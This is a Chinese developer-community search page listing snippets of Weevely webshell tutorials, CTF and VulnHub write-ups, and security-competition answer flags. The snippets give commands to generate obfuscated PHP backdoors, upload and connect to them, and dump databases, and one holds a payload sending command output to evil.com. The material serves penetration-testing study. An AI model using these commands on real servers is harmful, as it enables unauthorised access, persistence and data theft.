Weevely - 腾讯云开发者社区

文章/答案/技术大牛

发布

Weevely入手指南

Weevely是一款python编写的webshell管理工具，作为编写语言使用python的一款工具，它最大的优点就在于跨平台，可以算作是linux下的一款菜刀替代工具（限于php）,总的来说还是非常不错的一款工具...基本用法 root@kali:~# weevely [+] weevely 3.2.0 [!]...Error: too few arguments [+] Run terminal to the target weevely [cmd] [+] Load...session file weevely session [cmd] [+] Generate backdoor agent weevely generate Weevely" ?

1.5K2 0

Weevely命令传输分析

Weevely类似于菜刀，一个厚客户端，与一个轻服务端，由客户端生成要执行的代码，传递到服务端执行。与菜刀不同的是Weevely只提供命令行终端，同时自己生成服务端文件。...> Weevely将服务端代码分散放入单字符的变量中，同时夹杂着大量无用字符（@. ，随机字符）以绕过一些关键词的匹配。...> 代码传递不同于菜刀，Weevely单次的命令会发送多个HTTP请求，将要执行的代码进行分散传递。下面将结合Weevely Agent源码与数据包报文进行代码传递分析。...针对Weevely默认代码，可对HTTP Accept-Language字段进行检测，识别Weevely连接。但很容易通过修改源码进行绕过，将控制数组放置到其他HTTP字段中。...Github：https://github.com/epinna/weevely3

1.5K9 0

您找到你想要的搜索结果了吗？

是的

没有找到

Kali Weevely使用教程

Weevely是一个专门为web渗透攻击设计的web shell,由于是用python语言编写的工具，因此支持跨平台可以任何有python环境的系统上使用。...安装更新在kali中已经默认安装了weevely 其他类似系统安装执行下面命令即可。...apt-get install weevely -y 基础用法生成web shell 格式如下： weevely generate 示例： weevely generate...格式如下： weevely [cmd] 示例： weevely http://192.168.1.2/88.php 8888 image.png 查看系统信息所需命令...image.png 对数据库进行脱裤所需命令：sql_dump sql_dump -dbms mysql tianyuan root 12345678 image.png 文件操作当获取到目标系统的weevely

3K3 1

Weevely工具上传一句话木马

Weevely工具上传一句话木马实验环境说明：渗透机：kali-7（Kali Linux）用户名：root 密码：toor 靶机：win08-16（Windows 2008）用户名：administrator...命令来启动工具连接weevely生成的木马： weevely [cmd] 加载session会话文件： weevely session [cmd]...生成weevely后门木马文件： weevely generate 使用weevely -h来查看工具完整的使用方法第七步，使用命令weevely generate...，并在靶机服务器上重新扫描扫描结果如下，还是只检测到shell.php而hello.php并未检测出为网页木马第九步，使用命令weevely http://172.16.1.200/hackable/...uploads/hello.php hello连接weevely木马输入任意键回车后进入虚拟终端界面在虚拟终端模式，按Tab键查看可以利用的weevley模块，在需要使用的模块前面加上“:” 第十步

3101 0

上传漏洞

上传漏洞首先，标题是upload，提示就是上传漏洞无非就是js拦截，代码拦截，看了以下网页head头，发现js代码，关键字jpg burpsuite 抓包，配置代理 weevely 生成一句话...weevely generate password ./1.php #use weevely在当前目录生成1.php，密码passwd mv 1.php 1.php.jpg 选择文件上传 && burpsuite...抓包删掉.jpg 回显 upload success : upload/1592555994.1.php weevely 连接 weevely http://220.249.52.133:57535.../upload/1592554838.1.php password # weevely 连接 dir # 显示目录 cd ../..

5872 0

VulnHub靶机渗透之DC:3

利用weevely生成webshell，待使用。 ? 在Joomla后台的模板管理中，选择一个模板并编辑，增加一个名为webshell的php页面。 ?...将之前利用weevely生成的webshell粘贴进去，并保存。 ? weevely连接成功，获得shell。 ? 查看内核版本。 ?...用weevely shell生成一个meterpreter shell。 ? ?

3.6K2 0

kali下的中国菜刀

weevely 是kali中的php webshell 工具。但相较于 webacoo ，weevely 的功能更加强大，同时对于webshell的连接设立了密码选项！...下面我们来实例演示， weevely 的具体使用。...准备环境： kali linux Metasploitables2 首先还是先制作一个 webshell ,密码为 bbskali weevely generate bbskali secist.php...我们使用 cat 命令简单查看下 webshell 的内容： cat /usr/share/weevely/secist.php 现在我将生成的 webshell 远程拷贝到目标机器上： scp /usr.../share/weevely/secist.php msfadmin@192.168.30.128:/home/msfadmin 或者上传PHP木马连接一句话木马 weevely http://192.168.30.128

8972 0

网络安全之文件上传渗透测试

C:/AppServ/www/Uploadfile/uploads/uploads/backdoor.php 3.通过渗透机Kali Linux2对靶机Windows 7进行文件上传渗透测试，使用工具Weevely...在/目录下生成一个木马，木马名称为backdoor.php，密码为pass，该操作使用的命令中固定不变的字符串作为Flag值提交；使用命令生成木马文件 Flag：weevely generate pass.../backdoor.php 4.上传使用Weevely工具生成的木马backdoor1.php至服务器中，打开控制台使用网站安全狗检测本地是否存在木马，若检测出存在木马，则将木马所在的绝对路径作为Flag...C:/AppServ/www/Uploadfile/uploads/uploads/backdoor.php 5.通过渗透机Kali Linux2对靶机Windows 7进行文件上传渗透测试（使用工具Weevely...由于新版Weevely工具已经移除了generate.img命令，我们需要使用kali 1.0中的Weevely工具帮助我们生成木马需要上传test.gif和.htaccess两个文件注意：“.hataccess

2841 0

2022年全国职业院校技能大赛“网络安全”竞赛试题文件上传渗透测试答案Flag

false； c:/appserv/www/uploadfile/uploads/uploads/backdoor.php 4.通过渗透机Kali2.0对服务器场景Server9进行文件上传渗透测试，使用工具weevely...在/目录下生成一个木马，木马名称为backdoor.php，密码为pass，该操作使用命令中固定不变的字符串作为Flag值提交； weevely generate pass /backdoor.php...5.上传使用weevely生成的木马backdoor1.php至服务器中，打开控制台使用网站安全狗检测本地是否存在木马，若检测出存在木马，则将木马所在的绝对路径作为Flag值提交，若未检测出木马则提交false...； c:/appserv/www/uploadfile/uploads/uploads/backdoor.php 6.通过渗透机Kali2.0对服务器场景Server9进行文件上传渗透测试（使用工具weevely...，连接目标服务器上的木马文件），连接成功后将目标服务器主机名的字符串作为Flag值提交； PC6249546 7.开启网站安全狗的所有防护，再次使用weevely生成一个新的木马文件并将其上传至目标服务器

2241 0

web狗之writeup--do you know upload?

这里就是想介绍一下自己使用的一个特别好的工具，就是 weevely。这个工具是 kali 中类似于中国菜刀的工具，功能强大。这里主要介绍一下简单的使用以及我是用的时候一个小小的坑。...下面就是 weevely 的使用了。首先在 kali 中搜索这个工具打开，先生成木马：（ weevely generate） ?...下面就可以通过 weevely 拿到后门了。上传之后，首先访问一下文件路径。然后通过命令： weevely 就可以连接远程机器了： ?...后来才知道 weevely 无法保存数据库的状态，所以无法使用 usedatbasename 这样的语句。其实使用 select*fromctf.flag 就可以拿到 flag 了啊。

5752 0

web渗透测试工具大全_web安全攻防渗透测试实战指南 pdf

/hm scan 网站根目录六、Weevely(生成php后门工具) 下载地址: https://github.com/epinna/Weevely3 $ git clone https://github.com.../epinna/weevely3.git $ cd weevely3 #生成一个后门木马hello.php，密码为test $ ..../weevely.py generate test hello.php #连接后门 $ ..../weevely.py http://url地址/hello.php test 连接后操作命令 #查看系统信息 $ system.info #获取数据库连接信息 $ grep . '^[^*/#]*

9832 0

浅谈Typecho安全与防范

我们用weevely创建一个Shell # bbskali为连接密码 weevely generate bbskali 4.php 查看生成的代码 cat 4.php 看到乱码，不要慌，复制代码到404...文件连接： weevely http://blog.bbskali.cn/404.php bbskali 安全建议修改网站后台地址加强用户名和密码使用第三方验证码插件

1761 0

全网首发！Kali Linux 2025工具指南-权限提升持久篇

默认目录/usr/share/webshells 04 weevely Weevely是一个基于 Python 编写的工具，主要用于生成和管理 PHP程序。它采用 C/S 模式构建。...生成客户端： weevely generate 1234 /123.php 其中1234便是密码。

3841 0

【新手科普】盘点常见的Web后门

Weevely 在kali linux中，我们用的比较多的就是这款php后门管理工具 weevely了。 Weevely支持的功能很强大，使用http头进行指令传输。唯一的缺陷就是只支持php。 ?...我们通过帮助可以看到，weevely的使用还是很简单的，首先我们在/root目录下生成一个名为weevely.php密码为123的backdoor agent。...weevely generate 123 /root/weevely.php 然后我们只要上传到目标服务器之后运行 weevely 就能成功连接上了 ?

4K9 0

渗透利器 | 常见的WebShell管理工具

7、Weevely Weevely是一种Python编写的webshell管理工具，跨平台，只支持PHP。...github项目地址： https://github.com/epinna/weevely3 用法示例： weevely generate weevely ...同时，在Kali 2.0 版本下，集成了三款Web后门工具：WebaCoo、weevely、PHP Meterpreter。

2.6K0 0

Kali Linux渗透基础知识整理（四）：维持访问

weevely weevely是一款使用python编写的webshell工具（集webshell生成和连接于一身，仅用于安全学习教学之用，禁止非法用途），可以算作是linux下的一款菜刀替代工具（限于...使用weevely生成的shell免杀能力很强，并使用加密连接，往往能轻松突破防火墙拦截。...#从提示中可以看到连接一句话木马： weevely [cmd] 加载session文件 weevely session [cmd] 生成后门代理...#通过weevely生成一句话木马 weevely generate test /root/Desktop/test.php （#test为密码，/root/Desktop/test.php输出路径...通过weevely连接一句话木马，可直接执行CMD weevely http://www.xxx.cn/test.php test ?

2.9K8 0

带妹玩转vulnhub（六）

这里需要用到kali上的一个工具weevely，参考链接http://www.freebuf.com/sectool/39765.html 如下命令 weevely generate shell/root...shell.php 然后访问 http://192.168.43.132/uploaded_files/shell.php 没有任何提示，说明此是shell.php已经成功上传，并且我也进行了访问使用weevely...进行连接 weevely http://192.168.43.132/uploaded_files/shell.php shell ?

5571 0

从.Git泄露到RCE，赏金10,000美元！

//evil.com/$(id|base64|tr -d "\n"); 所以只剩下上传shell，唯一的障碍是对当前目录没有写权限，所以上传shell到uploads/ （生成shell，我用的是weevely...工具） https://github.com/epinna/weevely3 如果按步骤描述这个过程： 1.将 shell 保存在本地 txt 中，以便能够通过 curl 传输它，并在自己的主机上启动服务器用... ngrok 建立隧道 2.发送一个payload，将我们的 shell 保存在uploads/shell.php 3.使用weevely连接到上传的 shell 经过几天的帮助解决问题后，该公司奖励了我一笔赏金

3115 0

分享一些比较强悍的PHP木马大全-源码

五、PHP后门生成工具weevely weevely是一款针对PHP的webshell的自由软件，可用于模拟一个类似于telnet的连接shell，weevely通常用于web程序的漏洞利用，隐藏后门或者使用类似...telnet的方式来代替web 页面式的管理，weevely生成的服务器端php代码是经过了base64编码的，所以可以骗过主流的杀毒软件和IDS，上传服务器端代码后通常可以通过weevely直接运行。...weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术，后门中所使用的函数均是常用的字符串处理函数，被作为检查规则的eval，system等函数都不会直接出现在代码中

6.6K4 0

来无影去无踪的后门

3.weevely：可替代菜刀的工具项目地址：https://github.com/epinna/weevely3 后门生成的参数： :generate.php（生成php后门文件） :generate.img...该后门需要服务器开启.htaccess） :generate.htaccess（将后门代码插入到.htaccess，同样需要开启.htaccess支持）－generate/generate.php －weevely

6141 0

点击加载更多

Weevely入手指南

Weevely命令传输分析

Kali Weevely使用教程

Weevely工具上传一句话木马

上传漏洞

VulnHub靶机渗透之DC:3

kali下的中国菜刀

网络安全之文件上传渗透测试

2022年全国职业院校技能大赛“网络安全”竞赛试题文件上传渗透测试答案Flag

web狗之writeup--do you know upload?

web渗透测试工具大全_web安全攻防渗透测试实战指南 pdf

浅谈Typecho安全与防范

全网首发！Kali Linux 2025工具指南-权限提升持久篇

【新手科普】盘点常见的Web后门

渗透利器 | 常见的WebShell管理工具

Kali Linux渗透基础知识整理（四）：维持访问

带妹玩转vulnhub（六）

从.Git泄露到RCE，赏金10,000美元！

分享一些比较强悍的PHP木马大全-源码

来无影去无踪的后门

相关资讯

热门标签

活动推荐

运营活动

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐